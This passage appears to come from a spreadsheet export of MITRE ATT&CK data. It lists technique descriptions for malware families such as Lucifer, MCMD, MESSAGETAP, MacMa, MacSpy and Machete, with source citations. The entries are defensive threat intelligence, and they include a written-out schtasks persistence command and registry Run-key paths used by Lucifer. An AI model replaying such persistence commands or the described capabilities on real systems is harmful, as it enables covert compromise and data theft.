    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for existing stratum cryptomining information in &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--f8c754dd-a4a8-4507-bce2-c738e5354a3c</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can persist by setting Registry key values &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--25022051-be2f-4cc2-b61a-3de03fc3e8d6</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--0493bf17-29a1-4825-b1a2-6e037288637f</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can infect victims by brute forcing SMB.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--ef5479d8-f8f3-4754-989e-9930a245899c</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has established persistence by creating the following scheduled task &lt;code&gt;schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--5d972f64-4c81-43ce-ba08-2c791bd78287</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has used UPX packed binaries.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--5d4f48e5-48a1-4ade-ae59-b34824b8181f</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--339746da-8c6e-4273-8e17-895d3b50fe4d</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</si>
  <si>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</si>
  <si>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relationship--5473acfd-2cb3-45a8-97cb-c3962c606f1e</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the computer name, system architecture, default language, and processor frequency of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--aecb4057-07a2-4b44-805a-5566a4047e23</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the IP address of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--06b7b9b4-7cc8-4d7f-af8c-20fe8b8610b0</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the IP and port numbers for all remote connections from the compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--0d1fe44d-a476-4553-b163-1e03890ae7b4</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has the ability to identify the username on a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--42205acc-2d23-4ea9-ac29-980b6517d908</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can issue shell commands to download and execute additional payloads.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--be9fb7de-682e-4c5e-96f3-872405674e51</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use WMI to log into remote machines for propagation.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>relationship--fb9a793b-0ed7-4152-8802-e1861ad32ad2</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) can compress data before sending it.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>relationship--982d9af7-45bb-4cc0-9819-aaadb3304783</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) performs XOR encryption.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>relationship--21717b6b-1fc6-4619-9877-bb36237a8efd</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys, including those used for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--3c385d99-72c8-40b8-8eb5-f844c2b191c8</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--c2e6b2a9-86b7-439a-88ac-dd2c34456d71</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--57cb89ed-ead5-46b1-ade9-68e580274f65</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can upload additional files to a compromised host.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--ceaf4145-f168-4bba-8480-d3650bcc657f</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--81791886-02a4-4417-a2e7-d44f5a7f83bf</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can Base64 encode output strings prior to sending to C2.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--aefb92ff-56e9-47d9-adc9-ed504f271863</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use Registry Run Keys for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--f5a39799-22d3-42e6-b524-bd93744b0149</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use scheduled tasks for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--bb16d8ce-3017-4835-a282-b11d10abc8a1</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--7692e54c-eb9e-4051-afab-e810dff4cd77</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can launch a console process (cmd.exe) with redirected standard input and output.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--4e86ae1c-a19a-4aad-a030-6102f9fb439e</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--d6ddaace-75b2-4ff0-bb94-751095d6a357</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</si>
  <si>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</si>
  <si>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relationship--f60b8223-eea6-422e-99c6-7f9b70e8ea53</t>
  </si>
  <si>
    <t>After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--97323d60-9623-4b3e-8ff9-50370fef4e5b</t>
  </si>
  <si>
    <t>Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--1d90e3ef-1839-4bb8-8205-02e2461b5d55</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--f9c13c35-a493-4733-b51c-ab4857692e18</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--aa12e2a6-02e7-4001-af7b-6a60021ddbfd</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</si>
  <si>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</si>
  <si>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relationship--3318f441-6593-4a7b-bb7f-53ab15a1a672</t>
  </si>
  <si>
    <t>After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>relationship--b565458d-7831-4010-9596-4d6fe44fd738</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to schedule remote AT jobs.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--a5f43f22-7157-4e5a-8d08-d700471f1993</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to delete local files.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--24db8ce5-951e-4952-9aff-c005a563cb99</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about users on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--ef699184-4191-4fc0-8525-6fa1dcfc61d7</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to scan for open ports on hosts in a connected network.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--db85ce33-98cf-4fec-93bd-402909cbe4bc</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about shares on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--cffbdd23-bf18-4bb9-bd50-dc74b69784e2</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about groups.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--975739e9-bb45-49d6-a67f-bc770845b4bf</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to identify remote hosts on connected networks.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--05ee7ead-dfe8-4cd2-9e7c-8f1aada9bcde</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about the OS.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--231dc643-8b22-4a24-83f2-7327a1c5bd13</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) uses the command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--5df81b26-0cbe-4b2e-abce-bb7b98a1064d</t>
  </si>
  <si>
    <t>S1016</t>
  </si>
  <si>
    <t>MacMa</t>
  </si>
  <si>
    <t>malware--bdee9574-7479-4073-a7dc-e86d8acd073a</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has the ability to record audio.(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--7aa65075-fd72-460e-bded-8f0f5620d515</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can clear possible malware traces such as application logs.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--67ae2dbd-0b87-4656-b380-3d23b8e40479</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect then exfiltrate files from the compromised system.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--64af40e2-5138-429c-9b24-2f5ba846d668</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) decrypts a downloaded file using AES-128-EBC with a custom delta.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--a412040d-d8ed-48b4-979c-7cbc6f9ced1c</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used TLS encryption to initialize a custom protocol for C2 communications.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--f04dbb1e-bf75-4eee-9222-374c704bc07b</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) exfiltrates data from a supplied path over its C2 channel.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--8a0f5351-66d4-410d-9427-ff58420fc173</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can delete itself from the compromised computer.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--f83d3cd6-f54d-4016-874f-eb638c193402</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--f16f6118-810f-4e08-9178-001156c95b53</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has removed the `com.apple.quarantineattribute` from the dropped file, `$TMPDIR/airportpaird`.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--dc8fa1fa-6aff-45f7-a425-2f62bf729324</t>
  </si>
  <si>
    <t>12 May 2022</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has downloaded additional files, including an exploit for used privilege escalation.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e132f8f8-c15d-4423-8794-8571d37a3998</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can dump credentials from the macOS keychain.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--86fd8738-ab8f-4b80-8c8d-fc80df9e2c07</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</si>
  <si>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</si>
  <si>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relationship--b5a39593-27ad-44dc-99f9-fcadc6d464ed</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</si>
  <si>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</si>
  <si>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relationship--4f8c284a-faa2-4f58-be3b-e27f6ed84423</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has stored collected files locally before exfiltration.(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--44a77efc-9215-4e5a-a246-ac9669dc52a4</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used macOS API functions to perform tasks.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--78019dcb-e8d3-4c71-bad0-20f3e85968b2</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used a custom JSON-based protocol for its C&amp;C communications.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--151da49e-c3ee-4615-b62e-c8a3c93a32a6</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used TCP port 5633 for C2 Communication.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--a06533f5-02f9-4246-9315-0fa8df3465e0</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can enumerate running processes.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--8fbbe6cb-5b2b-433a-9193-7a3890fa3e95</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can manage remote screen sessions.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--6a076d46-bd2f-4572-b993-36b4c1fb25d3</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--2fb2a011-a35a-403a-a86b-d5489b1fa5c6</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--1501c966-8f40-4093-b0d1-b3d572b3a1ee</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect IP addresses from a compromised host.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--3bd6c03b-3ae4-4061-a3ce-7a90a62a0e1e</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can collect the username from the compromised machine.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--0bf4ebc1-e4e4-4d56-8380-cb9601de353f</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) has the capability to create and modify file timestamps.(Citation: ESET DazzleSpy Jan 2022)</t>
  </si>
  <si>
    <t>relationship--95ac6b41-2594-48a0-8437-c7d93111ed66</t>
  </si>
  <si>
    <t>[MacMa](https://attack.mitre.org/software/S1016) can execute supplied shell commands and uses bash scripts to perform additional actions.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c08ebacd-b5e4-48c3-8ee6-389c635801da</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>malware--f72251cb-2be5-421f-a081-99c29a1209e7</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can record the sounds from microphones on a computer.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--be12c965-ec79-4871-94de-c8421436c30c</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can steal clipboard contents.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--5a2b7013-a110-4a07-acf6-66a7f159954d</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) deletes any temporary files it creates(Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>relationship--08b4b3f1-3c20-4e70-8a42-99fd5f191b12</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) stores itself in &lt;code&gt;~/Library/.DS_Stores/&lt;/code&gt; (Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>relationship--87e853bb-a82f-4a8c-a43a-e7da05f43619</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) captures keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--e6884060-8245-46ff-b71f-025c6a82eb3f</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--22a54751-c1f2-498a-bae0-fa4736c86bf5</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses Tor for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--0e113a7f-2aba-4dc6-b4fc-4c0f0d013c3d</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can capture screenshots of the desktop over multiple monitors.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--e67e4cbe-e8f6-433b-a1d2-e869c35f6a52</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses HTTP for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--11f12767-22ca-4f4a-a911-8211dc8ac478</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) saves the window names.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--8ab5954b-d36f-40c3-8f90-7e4862d38f43</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) stores zipped files with profile data from installed web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--c254bf89-3726-4c56-aae5-700c59427daf</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)'s collected data is encrypted with AES before exfiltration.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--8b95c259-d8eb-4258-aec0-e7c92bf3ac05</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>relationship--a2ed58c0-7bd3-4a94-99b3-f2ff94dea408</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures audio from the computer’s microphone.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--86e8f395-3c57-4602-8e7c-30058d05a655</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)’s collected files are exfiltrated automatically to remote servers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--6cf0d062-e441-48ca-b675-2f01ae333b74</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--334ae43c-2c0b-4a7a-aab5-6ff59005dbf5</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) hijacks the clipboard data by creating an overlapped window that listens to keyboard events.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014) </t>
  </si>
  <si>
    <t>relationship--7e05e716-1a86-4f87-9eba-5b5c6ee61b8a</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</si>
  <si>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</si>
  <si>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relationship--fdf56c06-8e42-4cb5-b6e0-a7ec55355ff6</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects stored credentials from several web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--48a5f18e-d744-4600-8489-18533cadb0c0</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) searches the File system for files of interest.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--b8d078f6-77ad-4c6c-8d20-0c4a5a3fd05a</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) can find, encrypt, and upload files from fixed and removable drives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--9cba53fd-9b5c-4dc3-b933-c167b1d62a03</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)’s downloaded data is decrypted using AES.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--075c6890-45e1-495e-a83e-b81ab05a8b4e</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)'s collected data is exfiltrated over the same channel used for C2.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--18e170d7-ff3f-450b-9366-cea23216b60e</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has a feature to copy files from every drive onto a removable drive in a hidden folder.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>relationship--9ceaecae-f85d-4eb7-a518-fb98b2b71c66</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has sent data over HTTP if FTP failed, and has also used a fallback server.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--bdb7f4c5-3620-479b-af38-95f42e82fb68</t>
  </si>
  <si>
    <t xml:space="preserve">Once a file is uploaded, [Machete](https://attack.mitre.org/software/S0409) will delete it from the machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--230fb134-db80-490d-9c00-5039487d5903</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses FTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--685856c8-227b-41b3-841d-9a7be6389eb9</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) produces file listings in order to search for files to be exfiltrated.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--d0c60722-e668-4597-a25f-f7e1eb1a5962</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has the capability to exfiltrate stolen data to a hidden folder on a removable drive.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--f8f50914-3b71-40a2-b661-5e11571222a6</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/software/S0409) can download additional files for execution on the victim’s machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--9901b17d-551e-4971-9ff7-7142e7c2bb4e</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) logs keystrokes from the victim’s machine.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--a5c8b6af-8685-4068-8046-122bbd5f8845</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) stores files and logs in a folder on the local drive.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>relationship--79333543-6031-4aa4-91be-35d80fae8ed2</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--6c92e9a2-ed4b-40ba-831e-91fcc60aebd4</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>relationship--72cb3a93-f4c1-43a8-9a62-43bf1f6f4889</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.(Citation: ESET Machete July 2019)  </t>
  </si>
  <si>
    <t>relationship--b71a28d8-a1b1-41b4-a0ac-f92bef513c6e</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has scanned and looked for cryptographic keys and certificate file extensions.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--14adcf50-912a-48d5-87f6-72d2273039aa</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has a component to check for running processes to look for web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--268d6aed-3961-42d9-9d34-785a9903d004</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is written in Python and is used in conjunction with additional Python scripts.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--cb58db80-48e9-4138-9ce4-bd726a3d1745</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) used the startup folder for persistence.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>relationship--7e6995cc-c917-4ac7-84e1-5dbf661f29cd</t>
  </si>
  <si>
    <t>The different components of [Machete](https://attack.mitre.org/software/S0409) are executed by Windows Task Scheduler.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>relationship--2e532de4-b002-4c2d-a37c-6d535ff090fa</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) sends stolen data to the C2 server every 10 minutes.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--76b62130-29f5-4e3a-ace1-146a228a08a9</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures screenshots.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--fb99048f-bb37-47be-b2a5-d03d9ff087f1</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has been packed with NSIS.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--29dcecc6-83ea-4e82-b368-b54812157b41</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used base64 encoding.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>relationship--5ccf856f-abd9-4ef6-b17f-803ecb20435f</t>
  </si>
  <si>
